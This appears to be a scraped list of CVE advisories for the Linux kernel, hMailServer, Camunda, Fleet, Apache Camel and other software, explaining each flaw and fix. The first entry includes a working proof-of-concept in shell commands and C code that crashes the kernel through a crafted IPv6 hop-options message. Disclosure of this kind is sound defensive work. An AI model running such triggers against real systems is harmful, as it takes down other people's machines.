CVSS v3.1 |
| In the Linux kernel, the following vulnerability has been resolved:
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().
This bug is triggered as part of the calipso_skbuff_setattr()
routine when skb_cow() is passed headroom > INT_MAX
(i.e. (int)(skb_headroom(skb) + len_delta) < 0).
The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta = headroom - skb_headroom(skb) is never negative, otherwise
we will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.
Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.
PoC:
Using `netlabelctl` tool:
netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7
Then run the following PoC:
int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
// setup msghdr
int cmsg_size = 2;
int cmsg_len = 0x60;
struct msghdr msg;
struct sockaddr_in6 dest_addr;
struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
sizeof(struct cmsghdr) + cmsg_len);
msg.msg_name = &dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = NULL;
msg.msg_iovlen = 0;
msg.msg_control = cmsg;
msg.msg_controllen = cmsg_len;
msg.msg_flags = 0;
// setup sockaddr
dest_addr.sin6_family = AF_INET6;
dest_addr.sin6_port = htons(31337);
dest_addr.sin6_flowinfo = htonl(31337);
dest_addr.sin6_addr = in6addr_loopback;
dest_addr.sin6_scope_id = 31337;
// setup cmsghdr
cmsg->cmsg_len = cmsg_len;
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_HOPOPTS;
char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80
sendmsg(fd, &msg, 0); |
| In the Linux kernel, the following vulnerability has been resolved:
net/handshake: duplicate handshake cancellations leak socket
When a handshake request is cancelled it is removed from the
handshake_net->hn_requests list, but it is still present in the
handshake_rhashtbl until it is destroyed.
If a second cancellation request arrives for the same handshake request,
then remove_pending() will return false... and assuming
HANDSHAKE_F_REQ_COMPLETED isn't set in req->hr_flags, we'll continue
processing through the out_true label, where we put another reference on
the sock and a refcount underflow occurs.
This can happen for example if a handshake times out - particularly if
the SUNRPC client sends the AUTH_TLS probe to the server but doesn't
follow it up with the ClientHello due to a problem with tlshd. When the
timeout is hit on the server, the server will send a FIN, which triggers
a cancellation request via xs_reset_transport(). When the timeout is
hit on the client, another cancellation request happens via
xs_tls_handshake_sync().
Add a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel
path so duplicate cancels can be detected. |
| In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Fix XDP_TX path
For XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not
correct. __bnxt_poll_work() -> bnxt_rx_pkt() -> bnxt_rx_xdp() may be
looping within NAPI and some event flags may be set in earlier
iterations. In particular, if BNXT_TX_EVENT is set earlier indicating
some XDP_TX packets are ready and pending, it will be cleared if it is
XDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we
successfully call __bnxt_xmit_xdp(). But if the TX ring has no more
room, the flag will not be set. This will cause the TX producer to be
ahead but the driver will not hit the TX doorbell.
For multi-buf XDP_TX, there is no need to clear the event flags and set
BNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in
bnxt_rx_pkt().
The visible symptom of this is that the RX ring associated with the
TX XDP ring will eventually become empty and all packets will be dropped.
Because this condition will cause the driver to not refill the RX ring
seeing that the TX ring has forever pending XDP_TX packets.
The fix is to only clear BNXT_RX_EVENT when we have successfully
called __bnxt_xmit_xdp(). |
| Camunda 7.24.0 before 7.24.14 and 7.23.0 before 7.23.17 contains a missing authorization check vulnerability in engine-rest task sub-resources that allows authenticated attackers with no permission grants to access task comments and attachments by calling singular read and delete endpoints that lack the authorization-filtered checks enforced on their corresponding list endpoints. Attackers can exploit TaskAttachmentResourceImpl and TaskCommentResourceImpl methods such as getAttachment, getAttachmentData, deleteAttachment, and getComment using only a known object ID to read, download, or permanently delete task attachments and comments. |
| Unchecked input for a loop condition in Progressive Robot hMailServer 6.0.0 through 6.3.6 allows a remote unauthenticated attacker to stop the server carrying mail. The server bounds the mail it generates in response to a message - a rule forward, reply or copy, an account forward, a Sieve redirect, vacation or notify, a bounce, an out-of-office reply - by a counter it carries in the message's X-hMailServer-LoopCount header, and makes no more once the counter reaches the configured rule loop limit (5 by default); that is what ends a forwarding or auto-reply cycle in a bounded number of hops. X-hMailServer-LoopCount is an ordinary header that is not stripped from mail arriving from outside, and the server read it with a signed conversion and no validation, so a count below zero passed every test against the limit: a sender who sets X-hMailServer-LoopCount to a negative value, or on the Linux builds to a value above the 32-bit signed range that the conversion wraps to a negative one, lifts the bound, and a message that enters a generated-mail cycle then loops up to about two thousand million times, each hop a queued message and a delivery, filling the queue and disk and stopping mail service. The Sieve notify action (from 6.2.22) consulted no limit at all, and its increment of the count could overflow a signed integer; and an account could reset the counter on its own mail through a Sieve editheader of the header (from 6.2.22) or a rule Set header value action (all versions) ahead of a forward or redirect. |
| A weakness has been identified in calcom cal.com and cal.diy up to 6.2.0. Impacted is the function createWebhookProcedure of the file packages/trpc/server/routers/viewer/webhook/util.ts of the component Webhook Handler. Executing a manipulation of the argument ID can lead to authorization bypass. It is possible to launch the attack remotely. The pull request to fix this issue awaits acceptance. |
| A vulnerability was determined in diem-project diem up to 116974edfb9a5b8bd69cb13586dc62bcdbb485ad. This affects an unknown part of the file dmCorePlugin/plugins/dmUserPlugin/modules/dmUser/lib/BasedmUserActions.class.php of the component Sign-In. This manipulation of the argument Referer causes open redirect. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. |
| A security vulnerability has been detected in aircheng-org iWebShop-5 up to 5.16. This affects the function send_message_mobile of the file controllers/simple.php. Such manipulation of the argument user_id leads to weak password recovery. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. |
| ProjectSend 2.5.0 before 2.7.0 contains an unverified password change vulnerability in PasswordController::update() that lets sessions of Social-provisioned accounts set local passwords without the current password. Attackers holding a stolen session cookie can send PUT /settings/password to create a durable local password, enroll their own second factor, and persistently take over the account. |
| Fleet before 4.89.0 contains an unbounded recursion vulnerability in Apple MDM enrollment property list parsing that allows unauthenticated attackers to crash the server. Attackers can send a crafted binary plist payload of about 150 bytes to the enrollment endpoints, triggering exponential allocation or infinite recursion that exhausts CPU and memory. |
| Admidio from 5.0.0 before 5.0.16 contains an insecure direct object reference vulnerability in ForumService::saveTopic() that allows authenticated members to modify other users' forum topics. Attackers can replace the topic_uuid parameter in their own topic_save request, reusing their CSRF token, to overwrite the victim topic's title and first post. |
| FopProducer transforms the incoming XSL-FO message body by creating a javax.xml.transform.TransformerFactory through TransformerFactory.newInstance() and enabling only FEATURE_SECURE_PROCESSING before running an identity transform over the body. On the JDK's built-in transformer, that feature alone already empties the accessExternalDTD and accessExternalStylesheet limits, so an external DTD or entity is refused. When a third-party JAXP TransformerFactory such as Saxon-HE is on the classpath, for example because the application also uses camel-xslt-saxon or camel-saxon, TransformerFactory.newInstance() returns that implementation instead, and FEATURE_SECURE_PROCESSING on its own does not restrict external resource access on it. A DOCTYPE with an external subset, or an external general entity, declared in the XSL-FO document is then resolved and expanded while the body is transformed. An external sender whose XSL-FO reaches a fop producer could therefore read files readable by the Camel process and cause the process to issue requests to hosts the document names. camel-fop does not bring such a factory itself, and excludes Xalan, so a default deployment using the JDK transformer is not affected; the issue is reachable only where another component has placed an alternative JAXP TransformerFactory on the classpath. Releases on the 4.14.x line and earlier reached end of life before this issue was resolved and do not receive a fix. |
| The TrueBooker WordPress plugin before 1.3.0 does not verify that the requester owns a booking before rendering its confirmation summary, allowing unauthenticated attackers to enumerate booking identifiers and retrieve the personal information of customers who booked an appointment, as well as invalidate the customer's own confirmation link. |
| Insufficient session expiration vulnerability in Apache Answer.
This issue affects Apache Answer: through 2.0.2.
Insufficient session invalidation allowed revoked users to continue accessing known private uploaded files with a stale visit token.
Users are recommended to upgrade to version 2.0.3, which fixes the issue. |
| Openwave Webtop Media Transcoder does not enforce administrator-defined file type restrictions to restrict the file-types to be converted. This may allow an authenticated user to process and convert unintended document types if bypassing the Webmail experience. |
| Mitigation bypass in the Enterprise Policies component. This vulnerability was fixed in Firefox 158, Firefox ESR 153.5, Thunderbird 158, and Thunderbird 153.5. |

| In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: reject a kset that overruns its segment
cache_replay(), the writeback worker and the GC worker read a kset of
get_kset_onmedia_size() bytes and advance the position by it. A forged
key_num makes that size exceed the segment's remaining space, so the
advance walks past the segment and trips the cache_pos_advance() BUG_ON.
Reject a kset whose on-media size exceeds cache_seg_remain() before use. |
| A flaw was found in nfs-utils. The fsidd daemon improperly handles input received over its local domain socket by relying on program assertions to verify command arguments. A local user can exploit this vulnerability by sending a malformed request lacking the required arguments to trigger an assertion failure. This causes the daemon to crash, resulting in a Denial of Service (DoS) for filesystem identifier lookup services until restarted. |
| Vikunja 2.3.0 before 2.7.0 contains an improper session validation vulnerability that allows attackers to keep WebSocket access after revocation because handleAuth never checks the JWT sid claim against the sessions table. Attackers holding a stolen access token can open or maintain connections to /api/v2/ws after session deletion or TOTP enrollment, continuing to receive the victim's notification.created pushes, including comment, task and project content. |
